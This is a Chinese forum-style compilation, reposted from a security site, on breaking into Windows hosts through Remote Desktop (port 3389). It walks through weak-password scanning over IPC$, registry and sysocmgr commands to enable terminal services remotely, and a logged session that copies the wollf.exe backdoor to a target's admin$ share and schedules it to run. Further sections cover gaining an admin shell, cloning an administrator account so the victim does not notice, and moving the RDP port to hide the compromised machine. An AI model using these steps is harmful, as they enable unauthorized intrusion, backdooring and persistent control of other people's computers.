3389登陆器3389端口入侵怎么操作

3389登陆器时间:2021-02-03 阅读:()

开启3389的命令是多少？

REG query HKLMSYSTEMCurrentControlSetControlTerminal" "ServerWinStationsRDP-Tcp /v PortNumber 这条命令是查看远程桌面连接所开的端口是多少一般默认显示是0xd3d 也就是3389 。

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 这条是开启3389的命令 xp和2003可以使用。

开3389的工具也有！！！呵呵祝你好运！

远程登陆3389

对方如果是XP的机器除非对方睡觉挂机!要不然你登录进去的话会把当前用户注销掉以你XP默认不支持3389连接如果你远程连接对方就会注销了! 如果对方是2003服务器也就没问题了!知道了对方的管理员帐号和密码可以进去克隆一个管理员!这样就算登录了!对方也察觉不到的! 如果方便的话你可以来3389我一下试试!我XP 2003 LINUX 系统你都可以来尝试!

3389登录器为什么最近都突然不好用了？

我使用3389的时候没有发现有什么不一样! 你是登录网吧?还是从网吧登录? 你说的不是很清楚!只能大概分析一下! 登录的时候能连接上服务器吗? 卡到那一步了?? 使用自带登陆器,还是第三方的登陆器? 服务器是否使用了端口映射? 服务器端口开放情况? 你说的pubwin好像是个网吧管理软件吧! 抱歉没有接触过,无法给什么建议!

怎么在dos命令上开启3389

第一种方法：使用的工具: 1:ipcscan扫描器 2:终端服务连接工具xpts.exe(WIN 2000/XP 终端连接程序. 内附有COPY 文件的补丁. 格式 IP:Port ) 3:开终端的脚本rots.vbs(灰色轨迹zzzevazzz的作品) 4:cscript (在system32文件夹下;98操作系统可能没有二:步骤: 1:用ipcscan扫描弱口令(你们可以自己扫,我也扫到一些弱口令主机.演实时间我在论坛上再发) 2:用rots.vbs开启终端服务说明 cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项] 格式 cscript.exe rots.vbs ip user userpass port /r 或者 cscript.exe rots.vbs ip user userpass port /fr 三:常见问题: 1:脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。

因为pro版不能安装终端服务.如果你确信脚本判断错误,就继续安装好了. 2:可能会出现:ing 202.202.202.202 ....Error0x80070776 .Error description: 没有发现指定的此对象导出者,这个还是放弃吧. 3:可能会连接不上,请用这个格式127.0.0.1:1818 1818是刚才开的端口.第二种方法：进入后：TELNET上去！ c:>echo [Components] > c: ock c:>echo TSEnable = on >> c: ock c:>sysocmgr /i:c:winntinfsysoc.inf /u:c: ock /q 或者！ c:>echo [Components] > d:wawa c:>echo TSEnable = on >> d:wawa c:>sysocmgr /i:c:winntinfsysoc.inf /u:d:wawa /q 等会自动启后就OK 或者：在本地利用dos命令edit建立.bat后缀批处理文件（文件名随意） echo [Components] > c:sql echo TSEnable = on >> c:sqlsysocmgr /i:c:winntinfsysoc.inf /u:c:sql /q net use \ip地址ipc$ 密码 /user:用户名（一般默认:administrator) 利用at time 获取对方服务器时间。

copy 路径:xxx.bat \ip地址$c:winnt at time 00:00:00 xxx.bat 服务器执行命令后，服务器将重新启动，利用3389登陆就OK了！第三种方法：进入后,再次检查终端组件是否安装: c:>query user 这个工具需要安装终端服务. 这样就进一步确定了组件没有被安装.如果返回: USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME >w1 console 0 运行中 . 2002-1-12 22:5 \类似这样的信息,可能组件就已安装. 好!都清楚了,可以开始安装了. --------------------------------------------------- C:>dir c:sysoc.inf /s //检查INF文件的位置 c:WINNTinf 的目录 2000-01-10 20:00 3,770 sysoc.inf 1 个文件 3,770 字节 ----------------------------------------------------- C:> dir c:sysocmgr.* /s //检查组件安装程序 c:WINNTsystem32 的目录 2000-01-10 20:00 42,768 sysocmgr.exe 1 个文件 42,768 字节 ----------------------------------------------------- c:>echo [Components] > c: ock c:>echo TSEnable = on >> c: ock //这是建立无人参与的安装参数 c:>type c: ock [Components] TSEnable = on //检查参数文件 ------------------------------------------------------ c:>sysocmgr /i:c:winntinfsysoc.inf /u:c: ock /q ----------------------------------------------------- 这一条就是真正安装组件的命令. 以上这条命令没有加/R参数,主机在安装完后自动重起. 如若加了/R参数主机就不会重起. 如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时, 3389终端服务就已经开启.你就可以连上去了. 问题和建议: A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒. B 一次不行可以再试一次,在实际中很有作用. C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼, 而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错，所以会有B的建议. 第四种方法： C:Documents and Settingsshanlu.XZGJDOMAIN& use \218.22.155.*ipc$ "" /us er:administrator----------------连接成功！命令成功完成。

C:Documents and Settingsshanlu.XZGJDOMAIN>copy wollf.exe \218.22.155.*admi n$------------------------------拷贝wollf.exe到目标计算机的admin$目录已复制 1 个文件。

C:Documents and Settingsshanlu.XZGJDOMAIN>copy hbulot.exe \218.22.155.*adm in$-----------------------------拷贝hbulot.exe到目标计算机的admin$目录已复制 1 个文件。

C:Documents and Settingsshanlu.XZGJDOMAIN& time \218.22.155.* \218.22.155.* 的当前时间是 2002/12/1 上午 06:37 命令成功完成。

C:Documents and Settingsshanlu.XZGJDOMAIN>at \218.22.155.* 06:39 wollf.exe 新加了一项作业，其作业 ID = 1--指定wollf.exe在06:39运行 ------------------------------------------------------------------------------------------ 说明： wollf.exe是一个后门程序，很多高手都喜欢nc或者winshell，不过我对他情有独钟！在这里我只介绍与本文内容有关的命令参数，它的高级用法不做补充。

hbulot.exe是用于开启3389服务，如果不是server及以上版本，就不要运行了。

因为pro版不能安装终端服务。

2分钟后...... ------------------------------------------------------------------------------------------ C:Documents and Settingsshanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614 "Wollf Remote Manager" v1.6 Code by wollf, ------------------------------------------------------------------------------------------ 说明：使用wollf连接时要注意wollf.exe要在当前目录，它的连接命令格式：wollf -connect IP 7614 7614是wollf开放的端口。

如果显示如上，说明你已经连接成功，并具有管理员administrator权限。

------------------------------------------------------------------------------------------ [server@D:WINNTsystem32]#dos Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. ------------------------------------------------------------------------------------------ 说明：输入dos,你就会进入目标机的cmd下，这时同样具有administrator权限。

------------------------------------------------------------------------------------------ D:WINNTsystem32>cd.. cd.. D:WINNT>dir h*.* dir h*.* 驱动器 D 中的卷没有标签。

卷的序列号是 1CE5-2615 D:WINNT 的目录 2002-11-27 03:07 <DIR> Help 2002-09-10 12:16 10,752 hh.exe 2002-10-01 08:29 24,576 HBULOT.exe 2 个文件 35,328 字节 1 个目录 9,049,604,096 可用字节 D:WINNT>hbulot hbulot ------------------------------------------------------------------------------------------ 说明：因为我们把HBULOT.exe放到目标机的admin$下的，所以先找到它，以上是文件的存放位置。

D:WINNT>exit exit Command "dos" eed. [server@D:WINNTsystem32]#reboot Command "REBOOT" eed. [server@D:WINNTsystem32]# Connection closed. ------------------------------------------------------------------------------------------ 说明：由dos退到wollf的连接模式下用exit命令，HBULOT.exe运行后需重新启动方可生效，这里wollf自带的REBOOT 命令，执行过在5秒后你就会失去连接。

启动完毕后检查一下3389端口是否开放，方法很多，superscan3扫一下。

这时候你就可以登陆了。

如果没有开放3389那就不是server及以上版本，就不要运行了。

因为pro版不能安装终端服务。

到这里，你已经拥有3389肉鸡了！但是会不会被别的入侵者发现呢？下面所教的就是怎么让3389只为你服务！我们现在使用的3389登陆器有两种版本，一种是2000/98，一种是XP。

二者区别呢？前者使用的默认端口3389对目标，后者默认的也是3389端口，但是它还支持别的端口进行连接！所以呢......我们来修改3389的连接端口来躲过普通扫描器的扫描！修改方法如下：修改服务器端的端口设置，注册表有2个地方需要修改。

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds dpwdTds cp] PortNumber值，默认是3389，修改成所希望的端口，比如1314 第二个地方： [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp]　 PortNumber值，默认是3389，修改成所希望的端口，比如1314 现在这样就可以了。

重启系统吧。

注意：事实上，只修改第二处也是可以的。

另外，第二处的标准联结应该是 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStations<connection> <connection>表示具体的某个RDP-TCP连结。

重启过后，看看端口有没有改。

小技巧：修改注册表键值时，先选择10进制，输入你希望的端口数值，再选择16进制，系统会自动转换。

本篇文章来源于新世纪网安基地 () 原文出处： /Article/Text2/dos/200807/10761.html